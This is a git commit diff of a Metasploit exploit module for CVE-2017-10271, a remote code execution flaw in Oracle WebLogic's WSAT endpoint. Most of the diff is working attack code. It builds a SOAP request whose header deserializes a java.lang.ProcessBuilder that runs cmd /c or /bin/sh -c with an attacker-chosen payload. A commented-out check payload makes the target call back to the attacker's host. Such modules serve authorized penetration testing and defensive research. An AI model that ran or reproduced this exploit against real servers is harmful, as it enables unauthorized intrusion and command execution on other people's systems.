Fix feedback from wvu-r7

Fixes feedback from wvu-r7

- Consolidates payload to single method
- Replaces gsub! with standard encode method
- Credit the vulnerability discovery and the proof-of-concept code in the Author list (it still seems odd to list the discoverers as module authors...)
- Change link
- Use `ARCH_CMD` instead of `[ARCH_CMD]`
- Remove Linux target as it's only Windows or Unix
- Remove timeout as I don't know how to pass it to `send_request_cgi`
Kevin Kirsche 2018-01-06 08:12:43 -05:00 committed by GitHub
parent 744f20304c
commit 867b32415d
1 changed files with 33 additions and 60 deletions


@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q( 'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service.
), ),
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'], 'Author' => [
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
'Luffin', # Proof of Concept
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
],
'References' => 'References' =>
[ [
[ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'], [ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
[ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
[ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
[ 'CVE', '2017-10271'] [ 'CVE', '2017-10271']
], ],
'Platform' => %w{ win linux unix }, 'Platform' => %w{ win linux unix },
@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
[ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ], [ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
[ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
], ],
'Payload' =>
{
'DisableNops' => true
},
'DisclosureDate' => "Oct 19 2017", 'DisclosureDate' => "Oct 19 2017",
# Note that this is by index, rather than name. It's generally easiest # Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this # just to put the default at the beginning of the list and skip this
@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
]) ])
end end
def cmd_payload def cmd_base
# Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need if target_platform == 'win'
# This escaping makes sure that our payload works! return 'cmd'
replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ] else
xml_prepared = payload.encoded return '/bin/sh'
replacements.each do |r|
xml_prepared.gsub!(r[0], r[1])
end end
return xml_prepared
end end
def unix_payload def cmd_opt
if target_platform == 'win'
return '/c'
else
return '-c'
end
end
def process_builder_payload
# Generate a payload which will execute on a *nix machine using /bin/sh # Generate a payload which will execute on a *nix machine using /bin/sh
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <soapenv:Header>
@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
<object class="java.lang.ProcessBuilder"> <object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" > <array class="java.lang.String" length="3" >
<void index="0"> <void index="0">
<string>/bin/sh</string> <string>#{cmd_base}</string>
</void> </void>
<void index="1"> <void index="1">
<string>-c</string> <string>#{cmd_opt}</string>
</void> </void>
<void index="2"> <void index="2">
<string>#{cmd_payload}</string> <string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
# Generate a payload which will execute on a Windows machine using cmd
def windows_payload
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>#{cmd_payload}</string>
</void> </void>
</array> </array>
<void method="start"/> <void method="start"/>
@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
end end
# Not sure how to catch the response, so I'll leave this here in case someone can help # Not sure how to catch the response, so I'll leave this here in case someone can help
# def check_payload # This payload is used by sending to the RHOST and then you will receive an HTTP request
# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
# def http_check_payload
# xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> # xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
# <soapenv:Header> # <soapenv:Header>
# <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> # <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
# <java version="1.8" class="java.beans.XMLDecoder"> # <java version="1.8" class="java.beans.XMLDecoder">
# <object id="url" class="java.net.URL"> # <object id="url" class="java.net.URL">
# <string>http://{lhost}:{lport}/{random_uri}</string> # <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
# </object> # </object>
# <object idref="url"> # <object idref="url">
# <void id="stream" method = "openStream" /> # <void id="stream" method = "openStream" />
@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
# followed by the fake return address and then the payload. # followed by the fake return address and then the payload.
# #
def exploit def exploit
target_os = datastore['TARGET'].to_i xml_payload = process_builder_payload
xml_payload = ''
if target_os == 0
xml_payload = windows_payload
else
xml_payload = unix_payload
end
send_request_cgi( send_request_cgi(
'method' => 'POST', 'method' => 'POST',